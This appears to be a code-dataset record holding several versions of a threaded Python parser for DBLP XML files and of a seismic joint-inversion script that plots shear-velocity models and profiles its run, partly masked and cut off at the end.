thread',\n str(self.filenum))\n max_mitad = True\n if (doc_number / tot_docs == 1.0) & (not complete):\n print('100% de los documentos procesados en el thread',\n str(self.filenum))\n complete = True\n if child1.tag in docs:\n d['Type'] = child1.tag\n d['Authors'] = []\n for child2 in child1:\n if child2.tag in tags:\n if child2.tag == 'author':\n dicc_aut = dict()\n dicc_aut['Nombre'] = child2.text\n d['Authors'].append(dicc_aut)\n elif child2.tag == 'title':\n d['Title'] = child2.text\n elif child2.tag == 'year':\n d['Year'] = child2.text\n out.writelines(json.dumps(d) + '\\n')\n doc_number += 1\n out.close()\n\n\nfor i in range(7):\n MyThread(i).start()\n",
"step-4": "import xml.etree.ElementTree as ET\nfrom collections import OrderedDict\nimport json\nimport threading\n\n\nclass MyThread(threading.Thread):\n\n def __init__(self, filenum):\n threading.Thread.__init__(self)\n self.filenum = filenum\n print('Inicio del thread:', str(self.filenum))\n\n def run(self):\n parser = ET.XMLParser(encoding='ISO-8859-1')\n parser.entity['agrave'] = 'à'\n parser.entity['uuml'] = 'ü'\n parser.entity['Eacute'] = 'É'\n parser.entity['eacute'] = 'é'\n parser.entity['aacute'] = 'á'\n parser.entity['iacute'] = 'í'\n parser.entity['ouml'] = 'ö'\n parser.entity['ccedil'] = 'ç'\n parser.entity['egrave'] = 'è'\n parser.entity['auml'] = 'ä'\n parser.entity['uacute'] = 'ú'\n parser.entity['aring'] = 'å'\n parser.entity['oacute'] = 'ó'\n parser.entity['szlig'] = 'ß'\n parser.entity['oslash'] = 'ø'\n parser.entity['yacute'] = 'ỳ'\n parser.entity['iuml'] = 'ï'\n parser.entity['igrave'] = 'í'\n parser.entity['ocirc'] = 'ô'\n parser.entity['icirc'] = 'î'\n parser.entity['Uuml'] = 'Ü'\n parser.entity['euml'] = 'ë'\n parser.entity['acirc'] = 'â'\n parser.entity['atilde'] = 'ã'\n parser.entity['Uacute'] = 'Ù'\n parser.entity['Aacute'] = 'À'\n parser.entity['ntilde'] = 'ñ'\n parser.entity['Auml'] = 'Ä'\n parser.entity['Oslash'] = 'Ø'\n parser.entity['Ccedil'] = 'Ç'\n parser.entity['otilde'] = 'õ'\n parser.entity['ecirc'] = 'ê'\n parser.entity['times'] = '×'\n parser.entity['Ouml'] = 'Ö'\n parser.entity['reg'] = '®'\n parser.entity['Aring'] = 'Å'\n parser.entity['Oacute'] = 'Ò'\n parser.entity['ograve'] = 'ó'\n parser.entity['yuml'] = 'ÿ'\n parser.entity['eth'] = 'ð'\n parser.entity['aelig'] = 'æ'\n parser.entity['AElig'] = 'Æ'\n parser.entity['Agrave'] = 'Á'\n parser.entity['Iuml'] = 'Ï'\n parser.entity['micro'] = 'µ'\n parser.entity['Acirc'] = 'Â'\n parser.entity['Otilde'] = 'Õ'\n parser.entity['Egrave'] = 'É'\n parser.entity['ETH'] = 'Ð'\n parser.entity['ugrave'] = 'ú'\n parser.entity['ucirc'] = 'û'\n parser.entity['thorn'] = 'þ'\n parser.entity['THORN'] = 'Þ'\n parser.entity['Iacute'] = 'Ì'\n parser.entity['Icirc'] = 'Î'\n parser.entity['Ntilde'] = 'Ñ'\n parser.entity['Ecirc'] = 'Ê'\n parser.entity['Ocirc'] = 'Ô'\n parser.entity['Ograve'] = 'Ó'\n parser.entity['Igrave'] = 'Í'\n parser.entity['Atilde'] = 'Ã'\n parser.entity['Yacute'] = 'Ỳ'\n parser.entity['Ucirc'] = 'Û'\n parser.entity['Euml'] = 'Ë'\n xml_file = '../../../data/dblp.' + str(self.filenum) + '.xml'\n e = ET.parse(xml_file, parser=parser).getroot()\n tot_docs = len(e)\n doc_number = 0\n mitad = False\n max_mitad = False\n complete = False\n d = OrderedDict()\n docs = ['article', 'inproceedings', 'incollection']\n tags = ['author', 'year', 'title']\n with open('../../../data/result' + str(self.filenum) + '.txt', 'w'\n ) as out:\n out.writelines('')\n for child1 in e:\n if (doc_number / tot_docs > 0.5) & (not mitad):\n print('50% de los documentos procesados en el thread',\n str(self.filenum))\n mitad = True\n if (doc_number / tot_docs > 0.9) & (not max_mitad):\n print('90% de los documentos procesados en el thread',\n str(self.filenum))\n max_mitad = True\n if (doc_number / tot_docs == 1.0) & (not complete):\n print('100% de los documentos procesados en el thread',\n str(self.filenum))\n complete = True\n if child1.tag in docs:\n d['Type'] = child1.tag\n d['Authors'] = []\n for child2 in child1:\n if child2.tag in tags:\n if child2.tag == 'author':\n dicc_aut = dict()\n dicc_aut['Nombre'] = child2.text\n d['Authors'].append(dicc_aut)\n elif child2.tag == 'title':\n d['Title'] = child2.text\n elif child2.tag == 'year':\n d['Year'] = child2.text\n out.writelines(json.dumps(d) + '\\n')\n doc_number += 1\n out.close()\n\n\nfor i in range(7):\n MyThread(i).start()\n",
"step-5": "import xml.etree.ElementTree as ET\nfrom collections import OrderedDict\nimport json\nimport threading\n\nclass MyThread(threading.Thread):\n def __init__(self, filenum):\n threading.Thread.__init__(self)\n self.filenum = filenum\n print('Inicio del thread:', str(self.filenum))\n\n def run(self):\n parser = ET.XMLParser(encoding='ISO-8859-1')\n\n parser.entity[\"agrave\"] = 'à'\n parser.entity[\"uuml\"] = 'ü'\n parser.entity[\"Eacute\"] = 'É'\n parser.entity[\"eacute\"] = 'é'\n parser.entity[\"aacute\"] = 'á'\n parser.entity[\"iacute\"] = 'í'\n parser.entity[\"ouml\"] = 'ö'\n parser.entity[\"ccedil\"] = 'ç'\n parser.entity[\"egrave\"] = 'è'\n parser.entity[\"auml\"] = 'ä'\n parser.entity[\"uacute\"] = 'ú'\n parser.entity[\"aring\"] = 'å'\n parser.entity[\"oacute\"] = 'ó'\n parser.entity[\"szlig\"] = 'ß'\n parser.entity[\"oslash\"] = 'ø'\n parser.entity[\"yacute\"] = 'ỳ'\n parser.entity[\"iuml\"] = 'ï'\n parser.entity[\"igrave\"] = 'í'\n parser.entity[\"ocirc\"] = 'ô'\n parser.entity[\"icirc\"] = 'î'\n parser.entity[\"Uuml\"] = 'Ü'\n parser.entity[\"euml\"] = 'ë'\n parser.entity[\"acirc\"] = 'â'\n parser.entity[\"atilde\"] = 'ã'\n parser.entity[\"Uacute\"] = 'Ù'\n parser.entity[\"Aacute\"] = 'À'\n parser.entity[\"ntilde\"] = 'ñ'\n parser.entity[\"Auml\"] = 'Ä'\n parser.entity[\"Oslash\"] = 'Ø'\n parser.entity[\"Ccedil\"] = 'Ç'\n parser.entity[\"otilde\"] = 'õ'\n parser.entity[\"ecirc\"] = 'ê'\n parser.entity[\"times\"] = '×'\n parser.entity[\"Ouml\"] = 'Ö'\n parser.entity[\"reg\"] = '®'\n parser.entity[\"Aring\"] = 'Å'\n parser.entity[\"Oacute\"] = 'Ò'\n parser.entity[\"ograve\"] = 'ó'\n parser.entity[\"yuml\"] = 'ÿ'\n parser.entity[\"eth\"] = 'ð'\n parser.entity[\"aelig\"] = 'æ'\n parser.entity[\"AElig\"] = 'Æ'\n parser.entity[\"Agrave\"] = 'Á'\n parser.entity[\"Iuml\"] = 'Ï'\n parser.entity[\"micro\"] = 'µ'\n parser.entity[\"Acirc\"] = 'Â'\n parser.entity[\"Otilde\"] = 'Õ'\n parser.entity[\"Egrave\"] = 'É'\n parser.entity[\"ETH\"] = 'Ð'\n parser.entity[\"ugrave\"] = 'ú'\n parser.entity[\"ucirc\"] = 'û'\n parser.entity[\"thorn\"] = 'þ'\n parser.entity[\"THORN\"] = 'Þ'\n parser.entity[\"Iacute\"] = 'Ì'\n parser.entity[\"Icirc\"] = 'Î'\n parser.entity[\"Ntilde\"] = 'Ñ'\n parser.entity[\"Ecirc\"] = 'Ê'\n parser.entity[\"Ocirc\"] = 'Ô'\n parser.entity[\"Ograve\"] = 'Ó'\n parser.entity[\"Igrave\"] = 'Í'\n parser.entity[\"Atilde\"] = 'Ã'\n parser.entity[\"Yacute\"] = 'Ỳ'\n parser.entity[\"Ucirc\"] = 'Û'\n parser.entity[\"Euml\"] = 'Ë'\n\n\n xml_file = '../../../data/dblp.' + str(self.filenum) + '.xml'\n\n e = ET.parse(xml_file, parser=parser).getroot()\n\n tot_docs = len(e)\n doc_number = 0\n mitad = False\n max_mitad = False\n complete = False\n\n d = OrderedDict()\n docs = ['article', 'inproceedings', 'incollection']\n tags = ['author', 'year', 'title']\n\n # Borrado previo del fichero de resultados\n with open('../../../data/result' + str(self.filenum) +'.txt', 'w') as out:\n out.writelines('')\n\n # Almacenamiento de valores en dicc para volcado posterior a json\n for child1 in e:\n if ((doc_number / tot_docs > 0.5) & (not mitad)):\n print('50% de los documentos procesados en el thread',str(self.filenum))\n mitad = True\n if ((doc_number / tot_docs > 0.9) & (not max_mitad)):\n print('90% de los documentos procesados en el thread',str(self.filenum))\n max_mitad = True\n if ((doc_number / tot_docs == 1.0) & (not complete)):\n print('100% de los documentos procesados en el thread',str(self.filenum))\n complete = True\n if (child1.tag in docs):\n d['Type'] = child1.tag\n d['Authors'] = []\n for child2 in child1:\n if (child2.tag in tags):\n if (child2.tag == 'author'):\n dicc_aut = dict()\n dicc_aut[\"Nombre\"] = child2.text\n d['Authors'].append(dicc_aut)\n elif child2.tag == \"title\":\n d[\"Title\"] = child2.text\n elif child2.tag == \"year\":\n d[\"Year\"] = child2.text\n out.writelines(json.dumps(d) + '\\n')\n doc_number += 1\n out.close()\nfor i in range(7):\n MyThread(i).start()",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 5 14:23:28 2018
@author: emily
"""
import pipeline
import numpy as np
import matplotlib.pyplot as plt
import pstats
import cProfile
pr = cProfile.Profile()
pr.enable()
#def try_running():
max_it=200000
rnd_sd = 1
deps = np.concatenate((np.arange(0,10,0.2), np.arange(10,60,1), np.arange(60,201,5)))
model = pipeline.Model(vs = np.arange(3.5, 4.8, 0.1), all_deps = deps,
idep = np.array([25, 50, 60,70,80,90,100,102,104,106,
108,110,112]),
std_rf = 0, lam_rf = 0, std_swd = 0)
#model = pipeline.Model(vs = np.array([1.8, 2.4, 3.4, 4.5, 4.7, 4.65]), all_deps = deps,
# idep = np.array([10, 32, 41, 60, 96, 120]),
# std_rf = 0, lam_rf = 0, std_swd = 0)
#model = pipeline.Model(vs = np.array([3.4, 4.5]), all_deps = deps,
# idep = np.array([60, 96]),
# std_rf = 0, lam_rf = 0, std_swd = 0)
rf_obs = pipeline.SynthesiseRF(pipeline.MakeFullModel(model))
swd_obs = pipeline.SynthesiseSWD(pipeline.MakeFullModel(model), 1/np.arange(0.02,0.1, 0.01), 1e6)
all_lims = pipeline.Limits(
vs = (0.5,5.5), dep = (0,200), std_rf = (0,0.05),
lam_rf = (0.05, 0.5), std_swd = (0,0.15))
out = pipeline.JointInversion(rf_obs, swd_obs, all_lims, max_it, rnd_sd)
actual_model = pipeline.SaveModel(pipeline.MakeFullModel(model),out[1][:,0])
#%%
all_models = out[1]
good_mods = all_models[:,np.where(all_models[0,]>0)[0]]
nit = good_mods.shape[1]
good_mods = good_mods[:,-int(nit/5):]
mean_mod = np.mean(good_mods, axis = 1)
std_mod = np.std(good_mods, axis = 1)
good_mod = pipeline.Model(vs = mean_mod, all_deps = all_models[:,0],
idep = np.arange(0,mean_mod.size),
lam_rf = 0, std_rf = 0, std_swd = 0)
fullmodel = pipeline.MakeFullModel(good_mod)
fig1 = plt.figure();
ax1 = plt.subplot(121)
for k in range(all_models[1,].size-1):
colstr = str(0.75-k/2/all_models[1,].size)
plt.plot(all_models[:,k],all_models[:,0],
'-',linewidth=1,color=colstr)
ax1.invert_yaxis()
ax1.plot(actual_model,all_models[:,0],'r-',linewidth=3)
ax1.set_xlim((1.5,5))
ax1.set_xlabel('Shear Velocity (km/s)')
ax1.set_ylabel('Depth (km)')
ax1.set_title("{} iterations".format(nit*100))
ax3 = plt.subplot(122)
for k in range(good_mods[0,].size-1):
colstr = str(0.85-k/2/good_mods[0,].size)
ax3.plot(good_mods[:,k],all_models[:,0],
'-',linewidth=1,color=colstr)
ax3.invert_yaxis()
ax3.plot(mean_mod,all_models[:,0],'b-',linewidth = 2)
ax3.plot(mean_mod+std_mod, all_models[:,0],'c-',linewidth = 1)
ax3.plot(mean_mod-std_mod, all_models[:,0],'c-',linewidth = 1)
ax3.plot(actual_model,all_models[:,0],'r--',linewidth=1)
ax3.set_xlim((1.5,5))
ax3.set_xlabel('Shear Velocity (km/s)')
ax3.set_ylabel('Depth (km)')
ax3.set_title('Most recent {}'.format(good_mods.shape[1]))
allvels = np.arange(all_lims.vs[0],all_lims.vs[1],0.01)
evendeps = np.arange(0,all_models[-1,0],0.1)
i_ed = np.zeros(evendeps.shape, dtype = int)
for k in range(all_models[:,0].size-1,0,-1):
i_ed[all_models[k,0]>=evendeps] = k
mod_space = np.zeros((evendeps.size,allvels.size))
for k in range(1,good_mods.shape[1]):
even_vels = good_mods[i_ed,-k]
inds = np.round(even_vels-all_lims.vs[0],2)/0.01
inds = inds.astype(int)
mod_space[range(mod_space.shape[0]),inds] += 1
plt.tight_layout()
fig2 = plt.figure()
ax2 = plt.subplot(121)
ax2.imshow(np.log10(mod_space[-1::-1]+1e-1), cmap = 'viridis', aspect = allvels[-1]/evendeps[-1],
extent = [allvels[0], allvels[-1], evendeps[0], evendeps[-1]])
ax2.invert_yaxis()
ax2.set_xlabel('Shear Velocity (km/s)')
ax2.set_ylabel('Depth (km)')
ax2.xaxis.set_label_position('top')
ax2.xaxis.tick_top()
ax2.set_xlim((1.5,5))
plt.figure(); plt.title('Receiver Function - real: red; synth: grey')
rft = np.arange(0,rf_obs.dt*rf_obs.amp.size,rf_obs.dt)
plt.plot(rft, rf_obs.amp, 'r-', linewidth=2)
synth_rf = pipeline.SynthesiseRF(fullmodel)
plt.plot(rft,synth_rf.amp, '-',color = '0.25', linewidth=1)
synth_swd = pipeline.SynthesiseSWD(fullmodel, swd_obs.period, 1e6)
plt.figure(); plt.title('Surface Wave Dispersion - real: red; synth: grey')
plt.plot(swd_obs.period, swd_obs.c, 'r-', linewidth=2)
plt.plot(synth_swd.period, synth_swd.c, '-',color = '0.25', linewidth=1)
plt.figure(); plt.title("Mahalanobis distance (least squares misfit - phi)")
plt.plot(np.log10(out[2]))
plt.figure(); plt.title("Likelihood of accepting new model - alpha(m|m0)")
plt.plot(np.log10(out[3]))
print(np.mean(out[4]))
#%%
pr.disable()
s=open('thingy4.txt','w')
sortby = 'cumulative'
ps = pstats.Stats(pr, stream=s).sort_stats(sortby)
ps.print_stats()
s.close()
|
normal
|
{
"blob_id": "cfe5d013c968afdbf1fc80e3c8c3233a3678450b",
"index": 9848,
"step-1": "<mask token>\n",
"step-2": "<mask token>\npr.enable()\n<mask token>\nfor k in range(all_models[1,].size - 1):\n colstr = str(0.75 - k / 2 / all_models[1,].size)\n plt.plot(all_models[:, k], all_models[:, 0], '-', linewidth=1, color=colstr\n )\nax1.invert_yaxis()\nax1.plot(actual_model, all_models[:, 0], 'r-', linewidth=3)\nax1.set_xlim((1.5, 5))\nax1.set_xlabel('Shear Velocity (km/s)')\nax1.set_ylabel('Depth (km)')\nax1.set_title('{} iterations'.format(nit * 100))\n<mask token>\nfor k in range(good_mods[0,].size - 1):\n colstr = str(0.85 - k / 2 / good_mods[0,].size)\n ax3.plot(good_mods[:, k], all_models[:, 0], '-', linewidth=1, color=colstr)\nax3.invert_yaxis()\nax3.plot(mean_mod, all_models[:, 0], 'b-', linewidth=2)\nax3.plot(mean_mod + std_mod, all_models[:, 0], 'c-', linewidth=1)\nax3.plot(mean_mod - std_mod, all_models[:, 0], 'c-', linewidth=1)\nax3.plot(actual_model, all_models[:, 0], 'r--', linewidth=1)\nax3.set_xlim((1.5, 5))\nax3.set_xlabel('Shear Velocity (km/s)')\nax3.set_ylabel('Depth (km)')\nax3.set_title('Most recent {}'.format(good_mods.shape[1]))\n<mask token>\nfor k in range(all_models[:, 0].size - 1, 0, -1):\n i_ed[all_models[k, 0] >= evendeps] = k\n<mask token>\nfor k in range(1, good_mods.shape[1]):\n even_vels = good_mods[i_ed, -k]\n inds = np.round(even_vels - all_lims.vs[0], 2) / 0.01\n inds = inds.astype(int)\n mod_space[range(mod_space.shape[0]), inds] += 1\nplt.tight_layout()\n<mask token>\nax2.imshow(np.log10(mod_space[-1::-1] + 0.1), cmap='viridis', aspect=\n allvels[-1] / evendeps[-1], extent=[allvels[0], allvels[-1], evendeps[0\n ], evendeps[-1]])\nax2.invert_yaxis()\nax2.set_xlabel('Shear Velocity (km/s)')\nax2.set_ylabel('Depth (km)')\nax2.xaxis.set_label_position('top')\nax2.xaxis.tick_top()\nax2.set_xlim((1.5, 5))\nplt.figure()\nplt.title('Receiver Function - real: red; synth: grey')\n<mask token>\nplt.plot(rft, rf_obs.amp, 'r-', linewidth=2)\n<mask token>\nplt.plot(rft, synth_rf.amp, '-', color='0.25', linewidth=1)\n<mask token>\nplt.figure()\nplt.title('Surface Wave Dispersion - real: red; synth: grey')\nplt.plot(swd_obs.period, swd_obs.c, 'r-', linewidth=2)\nplt.plot(synth_swd.period, synth_swd.c, '-', color='0.25', linewidth=1)\nplt.figure()\nplt.title('Mahalanobis distance (least squares misfit - phi)')\nplt.plot(np.log10(out[2]))\nplt.figure()\nplt.title('Likelihood of accepting new model - alpha(m|m0)')\nplt.plot(np.log10(out[3]))\nprint(np.mean(out[4]))\npr.disable()\n<mask token>\nps.print_stats()\ns.close()\n",
"step-3": "<mask token>\npr = cProfile.Profile()\npr.enable()\nmax_it = 200000\nrnd_sd = 1\ndeps = np.concatenate((np.arange(0, 10, 0.2), np.arange(10, 60, 1), np.\n arange(60, 201, 5)))\nmodel = pipeline.Model(vs=np.arange(3.5, 4.8, 0.1), all_deps=deps, idep=np.\n array([25, 50, 60, 70, 80, 90, 100, 102, 104, 106, 108, 110, 112]),\n std_rf=0, lam_rf=0, std_swd=0)\nrf_obs = pipeline.SynthesiseRF(pipeline.MakeFullModel(model))\nswd_obs = pipeline.SynthesiseSWD(pipeline.MakeFullModel(model), 1 / np.\n arange(0.02, 0.1, 0.01), 1000000.0)\nall_lims = pipeline.Limits(vs=(0.5, 5.5), dep=(0, 200), std_rf=(0, 0.05),\n lam_rf=(0.05, 0.5), std_swd=(0, 0.15))\nout = pipeline.JointInversion(rf_obs, swd_obs, all_lims, max_it, rnd_sd)\nactual_model = pipeline.SaveModel(pipeline.MakeFullModel(model), out[1][:, 0])\nall_models = out[1]\ngood_mods = all_models[:, np.where(all_models[0,] > 0)[0]]\nnit = good_mods.shape[1]\ngood_mods = good_mods[:, -int(nit / 5):]\nmean_mod = np.mean(good_mods, axis=1)\nstd_mod = np.std(good_mods, axis=1)\ngood_mod = pipeline.Model(vs=mean_mod, all_deps=all_models[:, 0], idep=np.\n arange(0, mean_mod.size), lam_rf=0, std_rf=0, std_swd=0)\nfullmodel = pipeline.MakeFullModel(good_mod)\nfig1 = plt.figure()\nax1 = plt.subplot(121)\nfor k in range(all_models[1,].size - 1):\n colstr = str(0.75 - k / 2 / all_models[1,].size)\n plt.plot(all_models[:, k], all_models[:, 0], '-', linewidth=1, color=colstr\n )\nax1.invert_yaxis()\nax1.plot(actual_model, all_models[:, 0], 'r-', linewidth=3)\nax1.set_xlim((1.5, 5))\nax1.set_xlabel('Shear Velocity (km/s)')\nax1.set_ylabel('Depth (km)')\nax1.set_title('{} iterations'.format(nit * 100))\nax3 = plt.subplot(122)\nfor k in range(good_mods[0,].size - 1):\n colstr = str(0.85 - k / 2 / good_mods[0,].size)\n ax3.plot(good_mods[:, k], all_models[:, 0], '-', linewidth=1, color=colstr)\nax3.invert_yaxis()\nax3.plot(mean_mod, all_models[:, 0], 'b-', linewidth=2)\nax3.plot(mean_mod + std_mod, all_models[:, 0], 'c-', linewidth=1)\nax3.plot(mean_mod - std_mod, all_models[:, 0], 'c-', linewidth=1)\nax3.plot(actual_model, all_models[:, 0], 'r--', linewidth=1)\nax3.set_xlim((1.5, 5))\nax3.set_xlabel('Shear Velocity (km/s)')\nax3.set_ylabel('Depth (km)')\nax3.set_title('Most recent {}'.format(good_mods.shape[1]))\nallvels = np.arange(all_lims.vs[0], all_lims.vs[1], 0.01)\nevendeps = np.arange(0, all_models[-1, 0], 0.1)\ni_ed = np.zeros(evendeps.shape, dtype=int)\nfor k in range(all_models[:, 0].size - 1, 0, -1):\n i_ed[all_models[k, 0] >= evendeps] = k\nmod_space = np.zeros((evendeps.size, allvels.size))\nfor k in range(1, good_mods.shape[1]):\n even_vels = good_mods[i_ed, -k]\n inds = np.round(even_vels - all_lims.vs[0], 2) / 0.01\n inds = inds.astype(int)\n mod_space[range(mod_space.shape[0]), inds] += 1\nplt.tight_layout()\nfig2 = plt.figure()\nax2 = plt.subplot(121)\nax2.imshow(np.log10(mod_space[-1::-1] + 0.1), cmap='viridis', aspect=\n allvels[-1] / evendeps[-1], extent=[allvels[0], allvels[-1], evendeps[0\n ], evendeps[-1]])\nax2.invert_yaxis()\nax2.set_xlabel('Shear Velocity (km/s)')\nax2.set_ylabel('Depth (km)')\nax2.xaxis.set_label_position('top')\nax2.xaxis.tick_top()\nax2.set_xlim((1.5, 5))\nplt.figure()\nplt.title('Receiver Function - real: red; synth: grey')\nrft = np.arange(0, rf_obs.dt * rf_obs.amp.size, rf_obs.dt)\nplt.plot(rft, rf_obs.amp, 'r-', linewidth=2)\nsynth_rf = pipeline.SynthesiseRF(fullmodel)\nplt.plot(rft, synth_rf.amp, '-', color='0.25', linewidth=1)\nsynth_swd = pipeline.SynthesiseSWD(fullmodel, swd_obs.period, 1000000.0)\nplt.figure()\nplt.title('Surface Wave Dispersion - real: red; synth: grey')\nplt.plot(swd_obs.period, swd_obs.c, 'r-', linewidth=2)\nplt.plot(synth_swd.period, synth_swd.c, '-', color='0.25', linewidth=1)\nplt.figure()\nplt.title('Mahalanobis distance (least squares misfit - phi)')\nplt.plot(np.log10(out[2]))\nplt.figure()\nplt.title('Likelihood of accepting new model - alpha(m|m0)')\nplt.plot(np.log10(out[3]))\nprint(np.mean(out[4]))\npr.disable()\ns = open('thingy4.txt', 'w')\nsortby = 'cumulative'\nps = pstats.Stats(pr, stream=s).sort_stats(sortby)\nps.print_stats()\ns.close()\n",
"step-4": "<mask token>\nimport pipeline\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pstats\nimport cProfile\npr = cProfile.Profile()\npr.enable()\nmax_it = 200000\nrnd_sd = 1\ndeps = np.concatenate((np.arange(0, 10, 0.2), np.arange(10, 60, 1), np.\n arange(60, 201, 5)))\nmodel = pipeline.Model(vs=np.arange(3.5, 4.8, 0.1), all_deps=deps, idep=np.\n array([25, 50, 60, 70, 80, 90, 100, 102, 104, 106, 108, 110, 112]),\n std_rf=0, lam_rf=0, std_swd=0)\nrf_obs = pipeline.SynthesiseRF(pipeline.MakeFullModel(model))\nswd_obs = pipeline.SynthesiseSWD(pipeline.MakeFullModel(model), 1 / np.\n arange(0.02, 0.1, 0.01), 1000000.0)\nall_lims = pipeline.Limits(vs=(0.5, 5.5), dep=(0, 200), std_rf=(0, 0.05),\n lam_rf=(0.05, 0.5), std_swd=(0, 0.15))\nout = pipeline.JointInversion(rf_obs, swd_obs, all_lims, max_it, rnd_sd)\nactual_model = pipeline.SaveModel(pipeline.MakeFullModel(model), out[1][:, 0])\nall_models = out[1]\ngood_mods = all_models[:, np.where(all_models[0,] > 0)[0]]\nnit = good_mods.shape[1]\ngood_mods = good_mods[:, -int(nit / 5):]\nmean_mod = np.mean(good_mods, axis=1)\nstd_mod = np.std(good_mods, axis=1)\ngood_mod = pipeline.Model(vs=mean_mod, all_deps=all_models[:, 0], idep=np.\n arange(0, mean_mod.size), lam_rf=0, std_rf=0, std_swd=0)\nfullmodel = pipeline.MakeFullModel(good_mod)\nfig1 = plt.figure()\nax1 = plt.subplot(121)\nfor k in range(all_models[1,].size - 1):\n colstr = str(0.75 - k / 2 / all_models[1,].size)\n plt.plot(all_models[:, k], all_models[:, 0], '-', linewidth=1, color=colstr\n )\nax1.invert_yaxis()\nax1.plot(actual_model, all_models[:, 0], 'r-', linewidth=3)\nax1.set_xlim((1.5, 5))\nax1.set_xlabel('Shear Velocity (km/s)')\nax1.set_ylabel('Depth (km)')\nax1.set_title('{} iterations'.format(nit * 100))\nax3 = plt.subplot(122)\nfor k in range(good_mods[0,].size - 1):\n colstr = str(0.85 - k / 2 / good_mods[0,].size)\n ax3.plot(good_mods[:, k], all_models[:, 0], '-', linewidth=1, color=colstr)\nax3.invert_yaxis()\nax3.plot(mean_mod, all_models[:, 0], 'b-', linewidth=2)\nax3.plot(mean_mod + std_mod, all_models[:, 0], 'c-', linewidth=1)\nax3.plot(mean_mod - std_mod, all_models[:, 0], 'c-', linewidth=1)\nax3.plot(actual_model, all_models[:, 0], 'r--', linewidth=1)\nax3.set_xlim((1.5, 5))\nax3.set_xlabel('Shear Velocity (km/s)')\nax3.set_ylabel('Depth (km)')\nax3.set_title('Most recent {}'.format(good_mods.shape[1]))\nallvels = np.arange(all_lims.vs[0], all_lims.vs[1], 0.01)\nevendeps = np.arange(0, all_models[-1, 0], 0.1)\ni_ed = np.zeros(evendeps.shape, dtype=int)\nfor k in range(all_models[:, 0].size - 1, 0, -1):\n i_ed[all_models[k, 0] >= evendeps] = k\nmod_space = np.zeros((evendeps.size, allvels.size))\nfor k in range(1, good_mods.shape[1]):\n even_vels = good_mods[i_ed, -k]\n inds = np.round(even_vels - all_lims.vs[0], 2) / 0.01\n inds = inds.astype(int)\n mod_space[range(mod_space.shape[0]), inds] += 1\nplt.tight_layout()\nfig2 = plt.figure()\nax2 = plt.subplot(121)\nax2.imshow(np.log10(mod_space[-1::-1] + 0.1), cmap='viridis', aspect=\n allvels[-1] / evendeps[-1], extent=[allvels[0], allvels[-1], evendeps[0\n ], evendeps[-1]])\nax2.invert_yaxis()\nax2.set_xlabel('Shear Velocity (km/s)')\nax2.set_ylabel('Depth (km)')\nax2.xaxis.set_label_position('top')\nax2.xaxis.tick_top()\nax2.set_xlim((1.5, 5))\nplt.figure()\nplt.title('Receiver Function - real: red; synth: grey')\nrft = np.arange(0, rf_obs.dt * rf_obs.amp.size, rf_obs.dt)\nplt.plot(rft, rf_obs.amp, 'r-', linewidth=2)\nsynth_rf = pipeline.SynthesiseRF(fullmodel)\nplt.plot(rft, synth_rf.amp, '-', color='0.25', linewidth=1)\nsynth_swd = pipeline.SynthesiseSWD(fullmodel, swd_obs.period, 1000000.0)\nplt.figure()\nplt.title('Surface Wave Dispersion - real: red; synth: grey')\nplt.plot(swd_obs.period, swd_obs.c, 'r-', linewidth=2)\nplt.plot(synth_swd.period, synth_swd.c, '-', color='0.25', linewidth=1)\nplt.figure()\nplt.title('Mahalanobis distance (least squares misfit - phi)')\nplt.plot(np.log10(out[2]))\nplt.figure()\nplt.title('Likelihood of accepting new model - alpha(m|m0)')\nplt.plot(np.log10(out[3]))\nprint(np.mean(out[4]))\npr.disable()\ns = open('thingy4.txt', 'w')\nsortby = 'cumulative'\nps = pstats.Stats(pr, stream=s).sort_stats(sortby)\nps.print_stats()\ns.close()\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 5 14:23:28 2018\n\n@author: emily\n\"\"\"\n\nimport pipeline\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pstats\nimport cProfile\n \npr = cProfile.Profile()\npr.enable()\n\n\n#def try_running():\nmax_it=200000\nrnd_sd = 1\n\n\ndeps = np.concatenate((np.arange(0,10,0.2), np.arange(10,60,1), np.arange(60,201,5)))\nmodel = pipeline.Model(vs = np.arange(3.5, 4.8, 0.1), all_deps = deps,\n idep = np.array([25, 50, 60,70,80,90,100,102,104,106,\n 108,110,112]), \n std_rf = 0, lam_rf = 0, std_swd = 0)\n\n#model = pipeline.Model(vs = np.array([1.8, 2.4, 3.4, 4.5, 4.7, 4.65]), all_deps = deps,\n# idep = np.array([10, 32, 41, 60, 96, 120]), \n# std_rf = 0, lam_rf = 0, std_swd = 0)\n#model = pipeline.Model(vs = np.array([3.4, 4.5]), all_deps = deps,\n# idep = np.array([60, 96]), \n# std_rf = 0, lam_rf = 0, std_swd = 0)\n\n\nrf_obs = pipeline.SynthesiseRF(pipeline.MakeFullModel(model))\nswd_obs = pipeline.SynthesiseSWD(pipeline.MakeFullModel(model), 1/np.arange(0.02,0.1, 0.01), 1e6)\nall_lims = pipeline.Limits(\n vs = (0.5,5.5), dep = (0,200), std_rf = (0,0.05),\n lam_rf = (0.05, 0.5), std_swd = (0,0.15))\n\nout = pipeline.JointInversion(rf_obs, swd_obs, all_lims, max_it, rnd_sd)\n\nactual_model = pipeline.SaveModel(pipeline.MakeFullModel(model),out[1][:,0])\n#%%\nall_models = out[1]\ngood_mods = all_models[:,np.where(all_models[0,]>0)[0]]\nnit = good_mods.shape[1]\ngood_mods = good_mods[:,-int(nit/5):]\nmean_mod = np.mean(good_mods, axis = 1)\nstd_mod = np.std(good_mods, axis = 1)\n\ngood_mod = pipeline.Model(vs = mean_mod, all_deps = all_models[:,0],\n idep = np.arange(0,mean_mod.size),\n lam_rf = 0, std_rf = 0, std_swd = 0)\nfullmodel = pipeline.MakeFullModel(good_mod)\n\n\n\nfig1 = plt.figure();\n\nax1 = plt.subplot(121)\nfor k in range(all_models[1,].size-1): \n colstr = str(0.75-k/2/all_models[1,].size)\n plt.plot(all_models[:,k],all_models[:,0],\n '-',linewidth=1,color=colstr)\nax1.invert_yaxis()\nax1.plot(actual_model,all_models[:,0],'r-',linewidth=3)\nax1.set_xlim((1.5,5))\nax1.set_xlabel('Shear Velocity (km/s)')\nax1.set_ylabel('Depth (km)')\nax1.set_title(\"{} iterations\".format(nit*100))\n\nax3 = plt.subplot(122)\nfor k in range(good_mods[0,].size-1): \n colstr = 